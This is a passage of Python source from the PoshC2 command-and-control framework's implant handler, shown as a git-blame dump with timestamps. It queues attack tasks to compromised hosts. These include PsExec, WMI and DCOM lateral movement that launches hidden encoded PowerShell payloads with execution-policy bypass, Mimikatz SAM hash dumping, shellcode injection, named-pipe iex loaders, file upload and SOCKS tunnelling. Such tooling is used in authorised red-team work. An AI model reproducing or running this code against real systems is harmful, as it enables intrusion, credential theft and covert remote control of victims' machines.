2018-07-23 08:55:15 +00:00
|
|
|
if ri == "":
|
|
|
|
sys.exit(0)
|
|
|
|
if ri.lower() == "y":
|
|
|
|
sys.exit(0)
|
|
|
|
|
|
|
|
elif "invoke-psexecproxypayload" in command.lower():
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
|
2019-01-21 09:49:07 +00:00
|
|
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
|
|
|
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
2018-07-23 08:55:15 +00:00
|
|
|
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-01-21 09:49:07 +00:00
|
|
|
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2019-01-21 09:49:07 +00:00
|
|
|
else:
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Need to run createproxypayload first")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "invoke-psexecdaisypayload" in command.lower():
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
daisyname = raw_input("Payload name required: ")
|
2018-12-27 12:10:46 +00:00
|
|
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
2018-07-23 08:55:15 +00:00
|
|
|
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
|
|
|
|
params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
|
|
|
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Need to run createdaisypayload first")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "invoke-psexecpayload" in command.lower():
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
C2 = get_c2server_all()
|
2018-12-27 12:10:46 +00:00
|
|
|
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
|
2018-07-23 08:55:15 +00:00
|
|
|
"", "", "", "", C2[19], C2[20],
|
|
|
|
C2[21], get_newimplanturl(), PayloadsDirectory)
|
|
|
|
payload = newPayload.CreateRawBase()
|
|
|
|
params = re.compile("invoke-psexecpayload ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
|
|
|
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
# wmi lateral movement
|
|
|
|
|
|
|
|
elif "invoke-wmiproxypayload" in command.lower():
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
2019-01-21 09:49:07 +00:00
|
|
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
|
|
|
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
2018-07-23 08:55:15 +00:00
|
|
|
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-01-21 09:49:07 +00:00
|
|
|
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2019-01-21 09:49:07 +00:00
|
|
|
else:
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Need to run createproxypayload first")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "invoke-wmidaisypayload" in command.lower():
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
daisyname = raw_input("Name required: ")
|
2018-12-27 12:10:46 +00:00
|
|
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
2018-07-23 08:55:15 +00:00
|
|
|
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
|
|
|
|
params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
|
|
|
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Need to run createdaisypayload first")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "invoke-wmipayload" in command.lower():
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
C2 = get_c2server_all()
|
2018-12-27 12:10:46 +00:00
|
|
|
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
|
2018-07-23 08:55:15 +00:00
|
|
|
"", "", "", "", C2[19], C2[20],
|
|
|
|
C2[21], get_newimplanturl(), PayloadsDirectory)
|
|
|
|
payload = newPayload.CreateRawBase()
|
|
|
|
params = re.compile("invoke-wmipayload ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
|
|
|
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
# dcom lateral movement
|
|
|
|
|
|
|
|
elif "invoke-dcomproxypayload" in command.lower():
|
2019-01-21 09:49:07 +00:00
|
|
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
|
|
|
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
|
|
|
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
|
|
|
p = re.compile(ur'(?<=-target.).*')
|
|
|
|
target = re.search(p, command).group()
|
|
|
|
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(pscommand, user, randomuri)
|
2019-01-21 09:49:07 +00:00
|
|
|
else:
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Need to run createproxypayload first")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "invoke-dcomdaisypayload" in command.lower():
|
|
|
|
daisyname = raw_input("Name required: ")
|
2018-12-27 12:10:46 +00:00
|
|
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
2018-07-23 08:55:15 +00:00
|
|
|
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
|
|
|
|
p = re.compile(ur'(?<=-target.).*')
|
|
|
|
target = re.search(p, command).group()
|
|
|
|
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(pscommand, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Need to run createdaisypayload first")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "invoke-dcompayload" in command.lower():
|
|
|
|
C2 = get_c2server_all()
|
2018-12-27 12:10:46 +00:00
|
|
|
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
|
2018-07-23 08:55:15 +00:00
|
|
|
"", "", "", "", C2[19], C2[20],
|
|
|
|
C2[21], get_newimplanturl(), PayloadsDirectory)
|
|
|
|
payload = newPayload.CreateRawBase()
|
|
|
|
p = re.compile(ur'(?<=-target.).*')
|
|
|
|
target = re.search(p, command).group()
|
|
|
|
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(pscommand, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
# runas payloads
|
|
|
|
|
|
|
|
elif "invoke-runasdaisypayload" in command.lower():
|
|
|
|
daisyname = raw_input("Name required: ")
|
2018-12-27 12:10:46 +00:00
|
|
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
2018-07-23 08:55:15 +00:00
|
|
|
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("$proxypayload = \"%s\"" % payload, user, randomuri)
|
|
|
|
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
|
|
|
|
check_module_loaded("NamedPipeDaisy.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
|
|
|
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
|
|
|
|
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(pscommand, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Need to run createdaisypayload first")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "invoke-runasproxypayload" in command.lower():
|
|
|
|
C2 = get_c2server_all()
|
|
|
|
if C2[11] == "":
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Need to run createproxypayload first")
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
2018-12-27 12:10:46 +00:00
|
|
|
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
2018-07-23 08:55:15 +00:00
|
|
|
C2[13], C2[11], "", "", C2[19], C2[20],
|
|
|
|
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
|
|
|
payload = newPayload.CreateRawBase()
|
|
|
|
proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(proxyvar, user, randomuri)
|
|
|
|
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
|
|
|
|
check_module_loaded("NamedPipeProxy.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
params = re.compile("invoke-runasproxypayload ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
|
|
|
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
|
|
|
|
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(pscommand, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "invoke-runaspayload" in command.lower():
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
|
|
|
|
check_module_loaded("NamedPipe.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
params = re.compile("invoke-runaspayload ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
|
|
|
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
|
|
|
|
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(pscommand, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
|
2018-10-27 18:50:47 +00:00
|
|
|
print (posh_help)
|
2018-07-23 08:55:15 +00:00
|
|
|
elif command.lower() == "help 1":
|
2018-10-27 18:50:47 +00:00
|
|
|
print (posh_help1)
|
2018-07-23 08:55:15 +00:00
|
|
|
elif command.lower() == "help 2":
|
2018-10-27 18:50:47 +00:00
|
|
|
print (posh_help2)
|
2018-07-23 08:55:15 +00:00
|
|
|
elif command.lower() == "help 3":
|
2018-10-27 18:50:47 +00:00
|
|
|
print (posh_help3)
|
2018-07-23 08:55:15 +00:00
|
|
|
elif command.lower() == "help 4":
|
2018-10-27 18:50:47 +00:00
|
|
|
print (posh_help4)
|
2018-07-23 08:55:15 +00:00
|
|
|
elif command.lower() == "help 5":
|
2018-12-27 12:10:46 +00:00
|
|
|
print (posh_help5)
|
2018-07-23 08:55:15 +00:00
|
|
|
elif command.lower() == "help 6":
|
2018-10-27 18:50:47 +00:00
|
|
|
print (posh_help6)
|
2018-07-23 08:55:15 +00:00
|
|
|
elif command.lower() == "help 7":
|
2018-10-27 18:50:47 +00:00
|
|
|
print (posh_help7)
|
2018-07-23 08:55:15 +00:00
|
|
|
elif command.lower() == "help 8":
|
2018-12-27 12:10:46 +00:00
|
|
|
print (posh_help8)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
|
|
|
|
elif "get-pid" in command.lower():
|
|
|
|
pid = get_implantdetails(randomuri)
|
2018-10-27 18:50:47 +00:00
|
|
|
print (pid[8])
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "upload-file" in command.lower():
|
|
|
|
source = ""
|
|
|
|
destination = ""
|
2019-01-05 21:21:40 +00:00
|
|
|
s = ""
|
2019-01-05 12:54:49 +00:00
|
|
|
nothidden = False
|
|
|
|
if command.strip().lower() == "upload-file":
|
|
|
|
source = readfile_with_completion("Location of file to upload: ")
|
|
|
|
while not os.path.isfile(source):
|
|
|
|
print("File does not exist: %s" % source)
|
|
|
|
source = readfile_with_completion("Location of file to upload: ")
|
|
|
|
destination = raw_input("Location to upload to: ")
|
|
|
|
else:
|
|
|
|
args = argp(command)
|
|
|
|
source = args.source
|
|
|
|
destination = args.destination
|
|
|
|
nothidden = args.nothidden
|
2018-07-23 08:55:15 +00:00
|
|
|
try:
|
2019-01-05 12:54:49 +00:00
|
|
|
with open(source, "rb") as source_file:
|
|
|
|
s = source_file.read()
|
2018-07-23 08:55:15 +00:00
|
|
|
if s:
|
2019-01-05 21:21:40 +00:00
|
|
|
sourceb64 = base64.b64encode(s)
|
2019-01-05 12:54:49 +00:00
|
|
|
destination = destination.replace("\\","\\\\")
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("")
|
2019-01-05 12:54:49 +00:00
|
|
|
print ("Uploading %s to %s" % (source, destination))
|
|
|
|
if (nothidden):
|
2019-01-05 21:21:40 +00:00
|
|
|
uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, nothidden, sourceb64)
|
2018-11-15 14:10:40 +00:00
|
|
|
else:
|
2019-01-05 21:21:40 +00:00
|
|
|
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, sourceb64)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(uploadcommand, user, randomuri)
|
2019-01-05 12:54:49 +00:00
|
|
|
else:
|
|
|
|
print("Source file could not be read or was empty")
|
2018-07-23 08:55:15 +00:00
|
|
|
except Exception as e:
|
2019-01-05 12:54:49 +00:00
|
|
|
print ("Error with source file: %s" % e )
|
2018-12-27 12:10:46 +00:00
|
|
|
traceback.print_exc()
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "kill-implant" in command.lower() or "exit" in command.lower():
|
|
|
|
impid = get_implantdetails(randomuri)
|
|
|
|
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
|
|
|
|
if ri.lower() == "n":
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("Implant not terminated")
|
2018-07-23 08:55:15 +00:00
|
|
|
if ri == "":
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("exit", user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
kill_implant(randomuri)
|
|
|
|
if ri.lower() == "y":
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("exit", user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
kill_implant(randomuri)
|
|
|
|
|
|
|
|
elif "unhide-implant" in command.lower():
|
|
|
|
unhide_implant(randomuri)
|
|
|
|
|
|
|
|
elif "hide-implant" in command.lower():
|
|
|
|
kill_implant(randomuri)
|
|
|
|
|
2019-01-29 19:30:30 +00:00
|
|
|
elif "migrate" in command[:7].lower():
|
2018-07-23 08:55:15 +00:00
|
|
|
params = re.compile("migrate", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
|
|
|
migrate(randomuri, params)
|
|
|
|
|
|
|
|
elif "loadmoduleforce" in command.lower():
|
|
|
|
params = re.compile("loadmoduleforce ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded(params, randomuri, user, force=True)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "loadmodule" in command.lower():
|
|
|
|
params = re.compile("loadmodule ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded(params, randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "invoke-daisychain" in command.lower():
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
urls = get_allurls()
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("%s -URLs '%s'" % (command,urls), user, randomuri)
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("Now use createdaisypayload")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "inject-shellcode" in command.lower():
|
|
|
|
#elif (command.lower() == "inject-shellcode") or (command.lower() == "inject-shellcode "):
|
|
|
|
params = re.compile("inject-shellcode", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
readline.set_completer(filecomplete)
|
|
|
|
path = raw_input("Location of shellcode file: ")
|
|
|
|
t = tabCompleter()
|
|
|
|
t.createListCompleter(COMMANDS)
|
|
|
|
readline.set_completer(t.listCompleter)
|
|
|
|
try:
|
|
|
|
shellcodefile = load_file(path)
|
|
|
|
if shellcodefile != None:
|
|
|
|
arch = "64"
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
|
|
|
|
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
except Exception as e:
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("Error loading file: %s" % e)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
elif "listmodules" in command.lower():
|
2018-10-27 18:50:47 +00:00
|
|
|
print (os.listdir("%s/Modules/" % POSHDIR))
|
2018-07-23 08:55:15 +00:00
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
elif "modulesloaded" in command.lower():
|
2018-07-23 08:55:15 +00:00
|
|
|
ml = get_implantdetails(randomuri)
|
2018-10-27 18:50:47 +00:00
|
|
|
print (ml[14])
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif (command.lower() == "ps") or (command.lower() == "ps "):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("get-processlist", user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif (command.lower() == "hashdump") or (command.lower() == "hashdump "):
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
|
|
|
|
new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif (command.lower() == "sharpsocks") or (command.lower() == "sharpsocks "):
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("SharpSocks.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
import string
|
|
|
|
from random import choice
|
|
|
|
allchar = string.ascii_letters
|
|
|
|
channel = "".join(choice(allchar) for x in range(25))
|
|
|
|
sharpkey = gen_key()
|
|
|
|
sharpurls = get_sharpurls()
|
|
|
|
sharpurl = select_item("HostnameIP", "C2Server")
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 2000" % (sharpurl,channel,sharpkey,sharpurls), user, randomuri)
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("git clone https://github.com/nettitude/SharpSocks.git")
|
|
|
|
print ("SharpSocksServerTestApp.exe -c %s -k %s -l http://IPADDRESS:8080" % (channel,sharpkey))
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif (command.lower() == "history") or command.lower() == "history ":
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, get_history())
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "reversedns" in command.lower():
|
|
|
|
params = re.compile("reversedns ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "createdaisypayload" in command.lower():
|
2018-10-10 07:16:32 +00:00
|
|
|
createdaisypayload()
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "createproxypayload" in command.lower():
|
2018-10-10 07:16:32 +00:00
|
|
|
createproxypayload()
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "createnewpayload" in command.lower():
|
2018-10-10 07:16:32 +00:00
|
|
|
createproxypayload()
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
|
|
|
if command:
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(command, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
return
|
|
|
|
return
|
|
|
|
|
2019-02-11 17:05:14 +00:00
|
|
|
def commandloop(implant_id, user):
|
2018-07-23 08:55:15 +00:00
|
|
|
while(True):
|
|
|
|
try:
|
|
|
|
implant_id_orig = implant_id
|
|
|
|
t = tabCompleter()
|
|
|
|
t.createListCompleter(COMMANDS)
|
|
|
|
readline.set_completer_delims('\t')
|
|
|
|
readline.parse_and_bind("tab: complete")
|
|
|
|
readline.set_completer(t.listCompleter)
|
|
|
|
if ("-" in implant_id.lower()) or ("all" in implant_id.lower()) or ("," in implant_id.lower()):
|
2018-10-27 18:50:47 +00:00
|
|
|
print (Colours.GREEN)
|
2018-07-23 08:55:15 +00:00
|
|
|
command = raw_input("%s> " % (implant_id))
|
|
|
|
else:
|
|
|
|
hostname = get_hostdetails(implant_id)
|
2018-08-14 21:13:21 +00:00
|
|
|
if hostname[15] == 'OSX':
|
2018-12-27 12:10:46 +00:00
|
|
|
t.createListCompleter(UXCOMMANDS)
|
|
|
|
readline.set_completer_delims('\t')
|
|
|
|
readline.parse_and_bind("tab: complete")
|
|
|
|
readline.set_completer(t.listCompleter)
|
|
|
|
if hostname[15] == 'C#':
|
|
|
|
t.createListCompleter(SHARPCOMMANDS)
|
2018-08-14 21:13:21 +00:00
|
|
|
readline.set_completer_delims('\t')
|
|
|
|
readline.parse_and_bind("tab: complete")
|
|
|
|
readline.set_completer(t.listCompleter)
|
2018-10-27 18:50:47 +00:00
|
|
|
print (Colours.GREEN)
|
2019-02-06 15:05:08 +00:00
|
|
|
print ("%s\\%s @ %s (PID:%s)" % (hostname[11],hostname[2], hostname[3],hostname[8]))
|
2018-07-23 08:55:15 +00:00
|
|
|
command = raw_input("%s> " % (implant_id))
|
|
|
|
|
|
|
|
# if "all" run through all implants get_implants()
|
|
|
|
if implant_id.lower() == "all":
|
|
|
|
if command == "back":
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-07-23 08:55:15 +00:00
|
|
|
implant_split = get_implants()
|
|
|
|
if implant_split:
|
|
|
|
for implant_id in implant_split:
|
|
|
|
runcommand(command, implant_id[1])
|
|
|
|
# if "seperated list" against single uri
|
|
|
|
elif "," in implant_id:
|
|
|
|
implant_split = implant_id.split(",")
|
|
|
|
for implant_id in implant_split:
|
|
|
|
implant_id = get_randomuri(implant_id)
|
|
|
|
runcommand(command, implant_id)
|
|
|
|
# if "range" against single uri
|
|
|
|
elif "-" in implant_id:
|
|
|
|
implant_split = implant_id.split("-")
|
|
|
|
for implant_id in range(int(implant_split[0]), int(implant_split[1])+1):
|
|
|
|
try:
|
|
|
|
implant_id = get_randomuri(implant_id)
|
|
|
|
runcommand(command, implant_id)
|
|
|
|
except Exception as e:
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("Unknown ImplantID")
|
2018-12-27 12:10:46 +00:00
|
|
|
# else run against single uri
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
|
|
|
implant_id = get_randomuri(implant_id)
|
|
|
|
runcommand(command, implant_id)
|
|
|
|
|
|
|
|
# then run back around
|
2019-02-11 17:05:14 +00:00
|
|
|
commandloop(implant_id_orig, user) #is this required for a while loop? looks like it would lead to a stackoverflow anyway?
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
except Exception as e:
|
2018-10-27 18:50:47 +00:00
|
|
|
print (Colours.RED)
|
|
|
|
print ("Error running against the selected implant ID, ensure you have typed the correct information")
|
2019-02-12 22:02:09 +00:00
|
|
|
print Colours.END
|
2018-07-23 08:55:15 +00:00
|
|
|
#traceback.print_exc()
|
|
|
|
#print "Error: %s" % e
|
|
|
|
# remove the following comment when publishing to live
|
|
|
|
time.sleep(1)
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if __name__ == '__main__':
|
|
|
|
original_sigint = signal.getsignal(signal.SIGINT)
|
|
|
|
signal.signal(signal.SIGINT, catch_exit)
|
2019-02-11 17:05:14 +00:00
|
|
|
parser = argparse.ArgumentParser(description='The command line for handling implants in PoshC2')
|
|
|
|
parser.add_argument('-u', '--user', help='the user for this session')
|
|
|
|
args = parser.parse_args()
|
|
|
|
user = args.user
|
2019-02-12 09:13:19 +00:00
|
|
|
if user is None:
|
2019-02-12 19:12:27 +00:00
|
|
|
user = raw_input("Enter your username: ")
|
|
|
|
startup(user)
|